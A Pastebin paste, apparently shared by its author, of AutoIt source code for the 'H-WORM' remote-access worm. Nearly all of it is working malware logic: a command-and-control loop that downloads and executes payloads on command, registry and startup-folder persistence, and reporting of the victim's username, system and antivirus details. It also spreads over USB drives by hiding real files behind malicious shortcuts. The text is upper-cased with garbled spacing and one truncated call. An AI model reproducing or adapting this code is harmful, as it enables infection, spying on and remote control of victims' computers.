Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Cs = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- H-WORM UNDER WORLD (AUTOIT VERSION) \
- = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- CODER:
- HOUDINI (C) - WWW.DEV-POINT.COM
- COMPILED LANGUAGE:
- AUTOIT V 3.0
- VISIT OWR FOR MORE INFO OR CONTACT ME IN:
- SKYPE: HOUDINI-FX
- # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- # INCLUDE <PROCESS.AU3>
- # INCLUDE <WINAPI.AU3>
- # INCLUDE <FILE.AU3>
- # NOTRAYICON
- # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- WORM CONFIG
- # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- LOCAL $ IP_ADDR = "127.0.0.1"
- LOCAL $ PORT = "40055"
- LOCAL $ INSTALL_DIR = @ TEMPDIR
- # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- WORM VARIABLE
- # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- LOCAL $ CIMV2 = OBJGET ("WINMGMTS: {IMPERSONATIONLEVEL = IMPERSONATE}! \ \. \ ROOT \ CIMV2")
- LOCAL $ SPLITTER = "<|>"
- LOCAL $ WORM_VERSION = "H-WORM (AUTOIT)"
- LOCAL $ USB_SPREADING = "FALSE"
- LOCAL $ SERVER_CMD
- LOCAL $ W_METUX
- LOCAL $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT
- # CS = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- WORM CODE: START
- # CE = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - =
- IF NOT @ COMPILED THEN EXIT
- __INIT ()
- WHILE TRUE
- __USB_SPREADING ()
- __STARTUP ()
- $ SERVER_CMD = __ POST ("I_AM_READY")
- $ SERVER_CMD = STRINGSPLIT ($ SERVER_CMD, $ SPLITTER, 1)
- SELECT
- CASE $ SERVER_CMD [1] = "UNINSTALL"
- CONSOLEWRITE ($ SERVER_CMD [1] & @ CRLF)
- __USB_SPREADING ($ SERVER_CMD [1])
- REGDELETE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME)
- REGDELETE ("HKEY_CURRENT_USER \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME)
- FILEDELETE (@ STARTUPDIR & "\" & @ SCRIPTNAME)
- EXIT
- CASE $ SERVER_CMD [1] = "UPDATE"
- CONSOLEWRITE ("UPDATE" & $ SERVER_CMD [2] & @ CRLF)
- _WINAPI_CLOSEHANDLE ($ W_METUX)
- __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2], TRUE, "/ UPDATE")
- EXIT
- CASE $ SERVER_CMD [1] = "SEND"
- CONSOLEWRITE ("SEND" & $ SERVER_CMD [2] & @ CRLF)
- __DAWONLOAD_AND_EXEC ($ SERVER_CMD [2])
- CASE $ SERVER_CMD [1] = "EXCECUTE"
- CONSOLEWRITE ("EXCECUTE" & $ SERVER_CMD [2] & @ CRLF)
- __RUNA3X ($ SERVER_CMD [2])
- ENDSELECT
- SLEEP (5000)
- WEND
- FUNC __ INIT ()
- _PATHSPLIT (@ SCRIPTFULLPATH, $ WZDRIVE, $ WZDIR, $ WZFNAME, $ WZEXT)
- IF STRINGUPPER (FILEGETLONGNAME (@ SCRIPTFULLPATH)) <> STRINGUPPER (FILEGETLONGNAME ($ INSTALL_DIR & "\" & @ SCRIPTNAME)) THEN
- IF ($ CMDLINE [0]> 0) AND ($ CMDLINE [1] = "/ UPDATE") THEN
- DO
- UNTIL FILECOPY (@ SCRIPTFULLPATH, $ INSTALL_DIR & "\" & @ SCRIPTNAME, 1 +8) = 1
- ELSE
- FILECOPY (@ SCRIPTFULLPATH, $ INSTALL_DIR & "\" & @ SCRIPTNAME, 1 +8)
- ENDIF
- SHELLEXECUTE ($ INSTALL_DIR & "\" & @ SCRIPTNAME)
- EXIT
- ENDIF
- __ONE_INSTANCE ()
- __IS_USB_SPREADING ()
- ENDFUNC
- FUNC __ DAWONLOAD_AND_EXEC ($ FILE, $ RUN = TRUE, $ CMD = "")
- LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
- LOCAL $ FGET_HANDEL
- _PATHSPLIT ($ FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
- $ RESULT = __ POST ("IS-SENDING" & $ SPLITTER & $ FILE, "STREAM")
- $ FGET_HANDEL = FILEOPEN (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT, 16 +2 +8)
- FILEWRITE ($ FGET_HANDEL, $ RESULT)
- FILECLOSE ($ FGET_HANDEL)
- IF $ RUN THEN SHELLEXECUTE (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT, $ CMD)
- RETURN @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & $ SZEXT
- ENDFUNC
- FUNC __ RUNA3X ($ A3X_FILE, $ CMD = "")
- LOCAL $ H_RESOURCE, $ A3X_STRUCT, $ A3X_DATA
- LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT
- LOCAL $ FGET_HANDEL
- _PATHSPLIT ($ A3X_FILE, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
- FILECOPY (@ AUTOITEXE, @ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", 1 +8)
- $ A3X_DATA = __ POST ("IS-SENDING" & $ SPLITTER & $ A3X_FILE, "STREAM")
- $ A3X_STRUCT = DLLSTRUCTCREATE ("BYTE A3X [" & BINARYLEN ($ A3X_DATA) & "]")
- DLLSTRUCTSETDATA ($ A3X_STRUCT, "A3X", $ A3X_DATA)
- $ H_RESOURCE = DLLCALL
- IF $ H_RESOURCE [0] <> 0 THEN
- DLLCALL ($ A3X_STRUCT), "DWORD", DLLSTRUCTGETSIZE ($ A3X_STRUCT))
- DLLCALL ("KERNEL32.DLL", "BOOL", "EndUpdateResource", "HANDLE", $ H_RESOURCE [0], "BOOL", FALSE)
- SHELLEXECUTE (@ SCRIPTDIR & "\" & $ WZFNAME & "\" & $ SZFNAME & ". EXE", $ CMD)
- ENDIF
- ENDFUNC
- FUNC __ POST ($ DATA, $ TYPE = "TEXT")
- LOCAL $ RESULT
- HTTPSETUSERAGENT (__INFORMATIOM ())
- $ RESULT = INETREAD ("HTTP :/ /" & $ IP_ADDR & ":" & $ PORT & "/" & $ DATA, 1)
- IF $ TYPE = "TEXT" THEN RETURN STRINGUPPER (BINARYTOSTRING ($ RESULT))
- RETURN $ RESULT
- ENDFUNC
- FUNC __ STARTUP ()
- REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME, "REG_SZ", CHR (34) & $ INSTALL_DIR & "\" & @ SCRIPTNAME & CHR (34))
- REGWRITE ("HKEY_CURRENT_USER \ SOFTWARE \ MICROSOFT \ WINDOWS \ CURRENTVERSION \ RUN", $ WZFNAME, "REG_SZ", CHR (34) & $ INSTALL_DIR & "\" & @ SCRIPTNAME & CHR (34))
- FILECOPY (@ SCRIPTFULLPATH, @ STARTUPDIR & "\" & @ SCRIPTNAME)
- ENDFUNC
- FUNC __ INFORMATIOM ()
- LOCAL $ INFORAMTION = ""
- $ INFORAMTION = $ INFORAMTION & HEX (DRIVEGETSERIAL (@ HOMEDRIVE), 8) & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & @ COMPUTERNAME & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & @ USERNAME & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & __ OPERATING_SYSTEM () & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & $ WORM_VERSION & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & __ SECURITY_CENTER () & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & $ USB_SPREADING & $ SPLITTER
- $ INFORAMTION = $ INFORAMTION & __ TOP_WINDOWS ()
- RETURN $ INFORAMTION
- ENDFUNC
- FUNC __ OPERATING_SYSTEM ()
- LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
- LOCAL $ OS_CAPTION = ""
- FOR $ OS IN $ OPERATINGSYSTEM
- $ OS_CAPTION = $ OS.CAPTION & "."
- EXITLOOP
- NEXT
- RETURN $ OS_CAPTION
- ENDFUNC
- FUNC __ SECURITY_CENTER ()
- LOCAL $ OPERATINGSYSTEM = $ CIMV2.EXECQUERY ("SELECT * FROM WIN32_OPERATINGSYSTEM")
- LOCAL $ OS_VERSION
- LOCAL $ SECURITY_CENTER = "SECURITYCENTER"
- FOR $ OS IN $ OPERATINGSYSTEM
- $ OS_VERSION = NUMBER ($ OS.VERSION)
- NEXT
- IF $ OS_VERSION> 6 THEN $ SECURITY_CENTER = "SECURITYCENTER2"
- $ OBJ_SECURITY_CENTER = OBJGET ("WINMGMTS: \ \. \ ROOT \" & $ SECURITY_CENTER)
- LOCAL $ COL_ANTI_VIRUS = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM ANTIVIRUSPRODUCT")
- LOCAL $ ANTI_VIRUSE = ""
- LOCAL $ COL_FIRE_WALL = $ OBJ_SECURITY_CENTER.EXECQUERY ("SELECT * FROM FIREWALLPRODUCT")
- LOCAL $ FIRE_WALL = ""
- FOR $ OBJ_ANTI_VIRUS IN $ COL_ANTI_VIRUS
- $ ANTI_VIRUSE & = $ ANTI_VIRUSE & $ OBJ_ANTI_VIRUS.DISPLAYNAME & "."
- NEXT
- FOR $ OBJ_FIRE_WALL IN $ COL_FIRE_WALL
- $ FIRE_WALL & = $ FIRE_WALL & $ OBJ_FIRE_WALL.DISPLAYNAME & "."
- NEXT
- IF $ ANTI_VIRUSE = "" THEN $ ANTI_VIRUSE = "NO AV"
- IF $ FIRE_WALL = "" THEN $ FIRE_WALL = "NO FW"
- RETURN $ ANTI_VIRUSE & "<|>" & $ FIRE_WALL
- ENDFUNC
- FUNC __ TOP_WINDOWS ()
- LOCAL $ WINTOP_TEXT = _WINAPI_GETWINDOWTEXT (_WINAPI_GETFOREGROUNDWINDOW ())
- LOCAL $ WINTOP_PID, $ WINTOP_PNAME
- _WINAPI_GETWINDOWTHREADPROCESSID (_WINAPI_GETFOREGROUNDWINDOW (), $ WINTOP_PID)
- $ WINTOP_PNAME = _PROCESSGETNAME ($ WINTOP_PID)
- RETURN $ WINTOP_TEXT & "- [" & $ WINTOP_PNAME & "]"
- ENDFUNC
- FUNC __ ONE_INSTANCE ()
- $ W_METUX = _WINAPI_CREATEMUTEX ($ WZFNAME & "_" & $ WORM_VERSION)
- IF (@ ERROR) OR (_WINAPI_GETLASTERROR () = 183) THEN EXIT
- ENDFUNC
- FUNC __ USB_SPREADING ($ TYPE = "INSTALL")
- $ DISK = DRIVEGETDRIVE ("REMOVABLE")
- IF NOT ISARRAY ($ DISK) THEN RETURN
- FOR $ I = 1 TO $ DISK [0] STEP 1
- IF DRIVESTATUS ($ DISK [$ I]) = "READY" THEN __ IFOLDERS ($ DISK [$ I] & "\", $ TYPE)
- NEXT
- ENDFUNC
- FUNC __ IS_USB_SPREADING ()
- LOCAL $ W_KEY = STRINGSPLIT (@ SCRIPTNAME, ".")
- $ USB_SPREADING = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "")
- IF $ USB_SPREADING = "" THEN
- $ USB_SPREADING = "FALSE"
- IF STRINGUPPER (STRINGMID (@ SCRIPTFULLPATH, 2)) = STRINGUPPER (": \" & @ SCRIPTNAME) THEN $ USB_SPREADING = "TRUE"
- REGWRITE ("HKEY_LOCAL_MACHINE \ SOFTWARE \" & $ W_KEY [1], "", "REG_SZ", $ USB_SPREADING)
- ENDIF
- ENDFUNC
- FUNC __ IFOLDERS ($ ROOT, $ TYPE = "INSTALL", $ FIRST = TRUE, $ CALLBACK = "__CALLBACK")
- LOCAL $ H_SEARCH, $ ENUM_ARRAY [1], $ FIND_NAME
- LOCAL $ G_COUNTER = 0, $ L_COUNTER = 0
- $ ENUM_ARRAY [0] = $ ROOT
- DO
- $ H_SEARCH = FILEFINDFIRSTFILE ($ ENUM_ARRAY [$ G_COUNTER] & "\ *")
- DO
- $ FIND_NAME = FILEFINDNEXTFILE ($ H_SEARCH)
- IF NOT @ ERROR AND $ FIND_NAME <> "" THEN
- REDIM $ ENUM_ARRAY [UBOUND ($ ENUM_ARRAY) +1]
- $ ENUM_ARRAY [UBOUND ($ ENUM_ARRAY) -1] = $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME
- CALL ($ CALLBACK, $ ENUM_ARRAY [$ G_COUNTER] & "\" & $ FIND_NAME, $ TYPE)
- $ L_COUNTER + = 1
- ENDIF
- UNTIL @ ERROR OR $ FIND_NAME = ""
- FILECLOSE ($ H_SEARCH)
- IF $ FIRST = TRUE AND $ G_COUNTER = 0 THEN EXITLOOP
- $ G_COUNTER + = 1
- UNTIL $ G_COUNTER> $ L_COUNTER
- RETURN $ ENUM_ARRAY
- ENDFUNC
- FUNC __ CALLBACK ($ PATH, $ TYPE)
- LOCAL $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT, $ SZICON, $ ARGU
- _PATHSPLIT ($ PATH, $ SZDRIVE, $ SZDIR, $ SZFNAME, $ SZEXT)
- IF $ TYPE = "INSTALL" THEN
- IF (STRINGUPPER ($ SZEXT) = ". LNK") OR (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) THEN RETURN
- FILECOPY (@ SCRIPTFULLPATH, $ SZDRIVE & $ SZDIR & @ SCRIPTNAME, TRUE)
- FILESETATTRIB ($ SZDRIVE & $ SZDIR & @ SCRIPTNAME, "+ HS")
- $ ARGU = "/ C START" & STRINGREPLACE (@ SCRIPTNAME, "", CHRW (34) & "" & CHRW (34)) & "& START" & STRINGREPLACE ($ SZFNAME & $ SZEXT, "", CHRW (34) & "" & CHRW (34)) & "& EXIT"
- IF NOT STRINGINSTR (FILEGETATTRIB ($ PATH), "D") THEN
- $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \" & REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \" & $ SZEXT, "") & "\ DEFAULTICON", "")
- ELSE
- $ SZICON = REGREAD ("HKEY_LOCAL_MACHINE \ SOFTWARE \ CLASSES \ FOLDER \ DEFAULTICON", "")
- ENDIF
- $ SZICON = STRINGSPLIT ($ SZICON, ",")
- IF ($ SZICON [0] = 1) AND (STRINGINSTR ($ SZICON [1], "% 1") = 0) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU , "", $ SZICON [1], "", "", @ SW_HIDE)
- IF ($ SZICON [0] = 1) AND (STRINGINSTR ($ SZICON [1], "% 1")> 0) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU , "", $ PATH, "", "", @ SW_HIDE)
- IF ($ SZICON [0] = 2) THEN FILECREATESHORTCUT (@ COMSPEC, $ SZDRIVE & $ SZDIR & $ SZFNAME & ". LNK", "", $ ARGU, "", $ SZICON [1], "", $ SZICON [2] , @ SW_HIDE)
- FILESETATTRIB ($ PATH, "+ HS")
- ENDIF
- IF $ TYPE = "UNINSTALL" THEN
- IF (STRINGUPPER ($ SZEXT) = ". LNK") OR (STRINGUPPER ($ SZFNAME & $ SZEXT) = STRINGUPPER (@ SCRIPTNAME)) THEN FILEDELETE ($ PATH)
- FILESETATTRIB ($ PATH, "-HS")
- ENDIF
- ENDFUNC
- FUNC _WINAPI_CREATEMUTEX ($ SMUTEX, $ FINITIAL = 1, $ TSECURITY = 0)
- LOCAL $ RET = DLLCALL ('KERNEL32.DLL', 'PTR', 'CreateMutexW', 'PTR', DLLSTRUCTGETPTR ($ TSECURITY), 'INT', $ FINITIAL, 'WSTR', $ SMUTEX)
- IF (@ ERROR) OR (NOT $ RET [0]) THEN
- RETURN SETERROR (1, 0, 0)
- ENDIF
- RETURN $ RET [0]
- ENDFUNC
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement